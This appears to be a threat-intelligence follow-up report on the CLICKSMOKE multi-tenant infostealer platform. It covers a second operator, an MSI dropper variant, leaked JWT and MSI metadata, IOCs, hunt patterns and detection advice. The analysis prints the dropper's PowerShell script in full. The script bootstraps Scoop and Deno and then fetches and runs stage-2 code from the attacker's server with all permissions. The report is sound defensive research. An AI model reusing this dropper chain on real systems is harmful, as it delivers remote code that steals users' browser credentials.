CLICKSMOKE Update — A Second Tenant, an MSI Delivery Variant, and a Russian 'Test Build' on the Still-Live Dakatawebstick Platform
CLICKSMOKE Update — A Second Tenant, an MSI Delivery Variant, and a Russian "Test Build" on the Still-Live Dakatawebstick Platform
TL;DR
Nineteen days after our original CLICKSMOKE report, the dakatawebstick[.]com panel is still live on 94.26.90.100 (AS207043 / Dedik Services Limited). The original PS1 ClickFix build (3c736f7304ddeadb, operator alias Smokest) and a newer MSI build (8f7f1d313b5ebf34, operator alias aero) have both been retired by the operator — the panel now returns "Build not found" for both — while /health continues to answer ok with the same Caddy-fronted stack. Put simply: the operator cycled the burned builds but kept the infrastructure.
What we didn't publish in April 3's report was a second tenant's Bearer token, surfaced during a review of our investigation corpus. The token's claims name a distinct operator (userNote: "aero", userId: b7df91b1401aa529), a distinct build ID (8f7f1d313b5ebf34), and a Russian-language build note — buildNote: "тестовый билд" ("test build") — on a Windows MSI dropper that chains Scoop → Deno → a 276 KB Deno-runtime infostealer. MSI metadata leaks two additional developer-side handles, xray93 (MSI Author) and whiskey_tool63 (MSI Subject). The payload is still a browser-credential stealer targeting 20+ browsers and enumerating 20+ AV products, but the delivery stage moved from clipboard-paste ClickFix to a signed-looking MSI installer — a meaningful social-engineering shift.
What This Report Adds
- Confirms the multi-tenant MaaS hypothesis from post 3785 with a second independent tenant ("aero") sharing the same C2, JWT schema, and access-token-hash claim structure.
- Documents a Windows MSI delivery variant (
bbcc6c5249d8e8f9d52e031fabb38a42469b57526f997fb06483581e360fe3a0) — the Apr 3 report covered the PS1 path; this shows the platform also ships MSI droppers that install Scoop and Deno under the hood. - Extracts the Russian-language attribution marker
тестовый билд("test build") from the JWT payload'sbuildNotefield — the first verbatim Russian string recovered from the platform's build artifacts. - Recovers two additional actor-side handles from MSI metadata:
xray93(Author) andwhiskey_tool63(Subject) — candidate pivots for HUMINT/SIGINT. - Records the operator's response to public reporting: both known build IDs now serve "Build not found", while the panel itself stays up — a build-rotation pattern that defenders can key on.
This is a follow-up, not a restatement. The original platform anatomy, infrastructure fingerprinting (16+ /24 Dedik prefixes, Windows VPS subnet with self-signed hostnames, Cloudflare NS pair), and full kill-chain remain as documented on April 3. If you have prior reporting on "aero", xray93, or whiskey_tool63 as actor handles, please reach out and we'll update this post and credit the earlier source.
Panel State — Still Live, Builds Rotated
As of 2026-04-22, from an investigation-posture host:
/ HTTP 404 · 13B · text/plain Build not found
/health HTTP 200 · 2B · text/plain ok
/8f7f1d313b5ebf34.js HTTP 404 · 15B · octet-stream Build not found
/3c736f7304ddeadb.js HTTP 404 · 15B · octet-stream Build not found
Response headers still carry Via: 1.1 Caddy (twice) and Access-Control-Allow-Origin: *, confirming the same Caddy-fronted stack described in the April 3 report.
What this tells us: Dakatawebstick is not a dead domain. The operator is actively maintaining the platform's backend; they just no longer serve the two build IDs we have JWTs for. The three endpoints /event, /open, and /api still exist at the Caddy layer but gate on JWT + x-huid + custom headers — the platform has not been dismantled, only the two burned builds have been.
This is a consistent pattern for MaaS operators: infrastructure is expensive to rotate, builds are cheap.
The Second Tenant: "aero"
The original report named one operator — Smokest (userId: 1943c7b8c0a029e2, buildNote: "BatClickFixPS1NewV1", buildType: "ps1"). The second tenant surfaces in a separate sample captured fifteen days later:
| Claim | Value |
|---|---|
buildId | 8f7f1d313b5ebf34 |
buildNote | тестовый билд (Russian: "test build") |
buildType | msi |
proxyUrls | ["http://dakatawebstick[.]com"] |
userId | b7df91b1401aa529 |
userNote | aero |
accessTokenHash | 16ff1923903fcddf292661e8ee5d67ce794153f6c8562cf0022894372c39f12b |
iat | 1775681859 → 2026-04-07 04:57:39 UTC |
exp | 2091257859 → 2036-04-05 (ten-year validity) |
The schema is identical to Smokest's token — buildId, buildNote, buildType, proxyUrls[], userId, userNote, accessTokenHash, iat, exp — which is the strongest possible evidence that both builds came from the same backend panel and the panel treats tenants as first-class users.
The accessTokenHash differs between the two tenants (Smokest: 2e9812a0…, aero: 16ff1923…), consistent with per-user session hashing rather than a shared account.
The ten-year token validity is carried over from the Smokest build — both tokens were issued with exp = iat + 315576000 (ten years). This is either absent-minded developer defaults or a deliberate "don't fail builds on expiry in the field" choice. Either way it means every build this platform has ever shipped, or will ship, is trivially valid for a decade.
Token
Captured hardcoded in the stage-2 Deno loader:
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJidWlsZElkIjoiOGY3ZjFkMzEzYjVlYmYzNCIsImJ1
aWxkTm90ZSI6ItGC0LXRgdGC0L7QstGL0Lkg0LHQuNC70LQiLCJidWlsZFR5cGUiOiJtc2kiLCJwcm94
eVVybHMiOlsiaHR0cDovL2Rha2F0YXdlYnN0aWNrLmNvbSJdLCJ1c2VySWQiOiJiN2RmOTFiMTQwMWFh
NTI5IiwidXNlck5vdGUiOiJhZXJvIiwiYWNjZXNzVG9rZW5IYXNoIjoiMTZmZjE5MjM5MDNmY2RkZjI5
MjY2MWU4ZWU1ZDY3Y2U3OTQxNTNmNmM4NTYyY2YwMDIyODk0MzcyYzM5ZjEyYiIsImlhdCI6MTc3NTY4
MTg1OSwiZXhwIjoyMDkxMjU3ODU5fQ.klhXJphZ2bH1c5Ae6ehG8SBx0rQbRRMQXrGKxKGgg6g
(Alg: HS256. Signing secret is non-trivial — not cracked by our standard weak-secret dictionary.)
MSI Delivery Variant (8f7f1d313b5ebf34.msi)
Prior report: ClickFix → pasted PowerShell → Deno JS loader. New variant: MSI installer → custom PS1 dropper → Scoop → Deno → same JS loader.
| Property | Value |
|---|---|
| SHA256 | bbcc6c5249d8e8f9d52e031fabb38a42469b57526f997fb06483581e360fe3a0 |
| MD5 | a29676835d8529206b32a325ed8a4b37 |
| File type | Windows MSI (Composite Document File V2) |
| Size | 12,288 bytes |
| First seen on MB | 2026-04-17 20:57:45 UTC |
| MB reporter | smica83 (origin HU) |
| MB tags | dakatawebstick-com, msi |
| TLSH | T1AA429307B501C62AC695BF328EA7CBA903767D04CE9B11073AB2730D2EB71D039963E5 |
The chained loader
The MSI contains a single payload — net_update/Viper_platform15.ps1 — 227 bytes:
Set-ExecutionPolicy RemoteSigned -Scope CurrentUser -Force
if (-not (Get-Command scoop -ErrorAction SilentlyContinue)) {
irm get.scoop.sh | iex
}
scoop install deno
& deno -A "http://dakatawebstick.com/8f7f1d313b5ebf34.js"
The flow:
- MSI's
RunPsLaunchercustom action invokes the embedded PS1. - PS1 installs Scoop (via
irm get.scoop.sh | iex— a widely-legitimate developer bootstrap URL). - Scoop installs Deno.
- Deno fetches the stage-2 JS loader from the C2 and runs it with
-A(all permissions). - From that point forward, the kill chain is identical to the one documented in the April 3 report: persistence via
HKCU\…\Run, fingerprint as HUID, poll/openevery 60 s for the 276 KB stage-3 infostealer.
Note that nothing in this chain is novel on its own — Scoop, Deno, MSI wrapping, and PowerShell bootstraps are all legitimate tools in benign contexts. What makes it effective is the composition: using Deno as the runtime for the actual infostealer stage gets around both AV-engine inspection (which does not carry Deno grammar) and EDR memory-scan heuristics (the malicious code is dynamically fetched and evaluated by a legitimate signed binary).
MSI Metadata — xray93 and whiskey_tool63
MSI files are OLE2 compound documents. The summary stream of this one leaks:
| Field | Value |
|---|---|
| Author | xray93 |
| Subject | whiskey_tool63 |
| Comments | net_update |
| Created | 2026-04-08 20:57:40 UTC |
| Creating App | msitools 0.106.31-bf14 |
| Product GUID | {92F214E4-FE0B-4845-8652-C869E795C571} |
Three observations:
msitools 0.106.31-bf14is the Linux GNOME project's MSI builder. A Windows-targeted installer built on Linux is a classic crimeware tell — legitimate Windows ISVs almost always build MSIs via WiX on Windows. Pivoting onmsitoolsCreatingApplication in VT's MSI corpus is a high-signal hunt.xray93andwhiskey_tool63are candidate actor handles. MSI Author and Subject are free-form fields typically set by the builder at build time. They may be build-tool presets, developer usernames on the build host, or campaign project names. Either way, they are attribution primitives worth pivoting on alongsideaeroandSmokest.- MSI-created timestamp (2026-04-08) sits nine days after domain registration (2026-03-25) and nine days before first MalwareBazaar observation (2026-04-17). That suggests either a nine-day testing window before go-live, or — given the build's JWT is literally labeled "test build" — a deliberate test artifact that leaked into a public corpus. Both readings are interesting for attribution.
JWT Schema Continuity
Put the two tenants' tokens side by side:
| Field | Smokest (2026-03-31) | aero (2026-04-07) |
|---|---|---|
alg | HS256 | HS256 |
buildId | 3c736f7304ddeadb | 8f7f1d313b5ebf34 |
buildNote | BatClickFixPS1NewV1 | тестовый билд (Russian) |
buildType | ps1 | msi |
proxyUrls | ["http://dakatawebstick[.]com"] | ["http://dakatawebstick[.]com"] |
userId | 1943c7b8c0a029e2 | b7df91b1401aa529 |
userNote | Smokest | aero |
accessTokenHash | 2e9812a0dc5998a3… | 16ff1923903fcddf… |
| Issuer → expiry | 2026-03-31 → 2036-03-31 | 2026-04-07 → 2036-04-05 |
Schema: 100% identical structure, differing values. Every field is a first-class per-user claim. The platform is explicitly designed for multi-tenancy — it treats userId, userNote, and accessTokenHash as user-scoped, and buildId, buildNote, buildType, proxyUrls as build-scoped — which is how you'd architect it if you were selling build slots to third-party customers.
Both buildId values are 16 hex characters — exactly the output shape of a 64-bit integer or the first 8 bytes of a SHA256 truncated and hex-encoded. This makes buildId a compact hunt primitive: any URL of the form http://dakatawebstick[.]com/[a-f0-9]{16}\.js is a delivery endpoint.
A URL-scan pivot on that pattern across the dakatawebstick.com hostname turns up a third build ID, 3c736f7304ddeadb (the original Smokest PS1), and the now-known 8f7f1d313b5ebf34 (aero MSI). There is likely at least a fourth build ID in circulation that we do not yet have a JWT for — the panel returns "Build not found" rather than 404ing the URL space, which means the router knows about build IDs that it has chosen not to serve.
Multi-Tenancy Confirmed
Three weeks ago we wrote:
"The build system uses structured JWT payloads with buildId, buildNote, buildType, and userId fields — indicating a multi-tenant malware builder platform."
— post 3785, April 3
That was a hypothesis based on one tenant. This report has a second tenant, captured from a different sample submitted by a different researcher from a different country, using a different build type, with payload artifacts in a different language — all running on the same backend. It is no longer a hypothesis; it is observed.
Implications:
- There is a backend panel somewhere (port 3001 on
94.26.90.114is still an open question — the April 3 report noted it as "possibly a dev/panel port") that provisionsuserId, mintsaccessTokenHash, and emits builds with the observed JWT schema. That panel itself is of strong interest. - Tenants are being onboarded — the gap between Smokest's token (
iat = 2026-03-31) and aero's token (iat = 2026-04-07) is seven days. At that cadence there are plausibly half a dozen tenants on the platform by now. - The platform is probably being sold (or shared) on Russian-language crime forums or Telegram — the
buildNoteconvention is in Russian for aero, and Dedik Services is a Russian-language-friendly BPH operator.
Updated IOCs
Infrastructure (unchanged from post 3785, confirmed live 2026-04-22)
| Type | Value | Notes |
|---|---|---|
| Domain | dakatawebstick[.]com | C2 — live |
| IPv4 | 94.26.90.100 | C2 origin — live |
| ASN | AS207043 | Dedik Services Limited |
| Subnet | 94.26.90.0/24 | Mixed Linux / Windows VPS fleet |
| Nameservers | ram.ns.cloudflare.com, tess.ns.cloudflare.com | Cloudflare |
| Registrar | CNOBIN Information Technology Ltd via ordertld.com | Chinese registrar |
New artifacts (this report)
| Type | Value | Notes |
|---|---|---|
| SHA256 | bbcc6c5249d8e8f9d52e031fabb38a42469b57526f997fb06483581e360fe3a0 | 8f7f1d313b5ebf34.msi — aero MSI dropper |
| MD5 | a29676835d8529206b32a325ed8a4b37 | Same MSI |
| SHA1 | 705a5228eebbed1e999387e8dee9736f9e00ffb7 | Same MSI |
| TLSH | T1AA429307B501C62AC695BF328EA7CBA903767D04CE9B11073AB2730D2EB71D039963E5 | Same MSI |
| URL | http://dakatawebstick[.]com/8f7f1d313b5ebf34.js | Stage 2 — retired |
| BuildID | 8f7f1d313b5ebf34 | aero MSI campaign |
| MSI GUID | {92F214E4-FE0B-4845-8652-C869E795C571} | Product GUID |
| PS1 filename | net_update\Viper_platform15.ps1 | Stage 1 inside MSI |
| Operator handle | aero | Per JWT userNote |
| Operator ID | b7df91b1401aa529 | Per JWT userId |
| Access token hash | 16ff1923903fcddf292661e8ee5d67ce794153f6c8562cf0022894372c39f12b | Per JWT |
| MSI Author | xray93 | OLE2 summary metadata |
| MSI Subject | whiskey_tool63 | OLE2 summary metadata |
| MSI Comments | net_update | OLE2 summary metadata |
| Creating App | msitools 0.106.31-bf14 (Linux) | Build-host fingerprint |
Build IDs observed on the platform
| buildId | tenant | type | status (2026-04-22) |
|---|---|---|---|
3c736f7304ddeadb | Smokest | ps1 | retired — "Build not found" |
8f7f1d313b5ebf34 | aero | msi | retired — "Build not found" |
Hunt patterns
- URL regex:
^http://dakatawebstick\.com/[a-f0-9]{16}\.(js|msi|ps1)$ - MSI
CreatingApplication=msitools 0.106.31*— hunt this string across VT's MSI corpus for other Linux-built droppers. - MSI Author / Subject combinations:
xray93/whiskey_tool63— search across MSI sample sets for reuse. - JWT claim shape: any captured token with the exact set
{buildId, buildNote, buildType, proxyUrls, userId, userNote, accessTokenHash, iat, exp}is a CLICKSMOKE platform artifact.
Recommendations
Endpoint defenders:
- Alert on
deno.exeexecution on Windows endpoints outside explicit developer workstations. - Alert on
scoopinstallation bootstrapped fromget.scoop.shunder PowerShell initiated bymsiexec.exe. - Hunt for MSI files where OLE2
CreatingApplicationcontainsmsitools— a very strong adversary-tooling signal for Windows-targeted Linux-built installers.
CTI / tracking:
- Add
aero,xray93,whiskey_tool63to actor-handle watchlists alongsideSmokest. - If you track MaaS forums, hunt for "CLICKSMOKE"-adjacent offerings that mention Deno, MSI delivery, or multi-tenant builder platforms.
- Hunt for the JWT claim-shape signature described above in any captured malware C2 traffic.
Hosting / takedown:
- Abuse contact for Dedik Services is
abuse@dedik.io. Dedik has not responded to abuse reports on this network per the April 3 report. - The Cloudflare NS pair (
ram.ns.cloudflare.com,tess.ns.cloudflare.com) is a single-account pair — Cloudflare's abuse team can identify and act against other domains on the same account.
Investigation conducted by Breakglass Intelligence. This is a follow-up to post 3785 (Apr 3, 2026). If you have prior reporting on "aero", "xray93", "whiskey_tool63", or CLICKSMOKE's backend panel, please reach out — we'll update this post and credit earlier work. Contact: reply or DM @BreakGlassIntel on X.